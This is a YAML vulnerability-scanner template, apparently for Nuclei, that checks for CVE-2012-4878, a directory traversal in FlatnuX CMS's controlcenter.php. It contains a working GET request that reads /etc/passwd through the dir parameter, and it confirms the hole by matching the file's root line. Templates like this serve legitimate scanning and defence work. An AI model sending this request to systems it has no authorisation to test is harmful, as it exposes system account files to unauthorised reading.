37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
|
id: CVE-2012-4878
|
||
|
|
||
|
info:
|
||
|
name: FlatnuX CMS - Directory Traversal
|
||
|
author: daffainfo
|
||
|
severity: high
|
||
|
description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/37034
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-4878
|
||
|
- http://www.vulnerability-lab.com/get_content.php?id=487
|
||
|
- http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||
|
cvss-score: 5
|
||
|
cve-id: CVE-2012-4878
|
||
|
cwe-id: CWE-22
|
||
|
tags: cve2012,lfi,traversal,edb,packetstorm,cve
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0:"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
# Enhanced by mp on 2022/02/21
|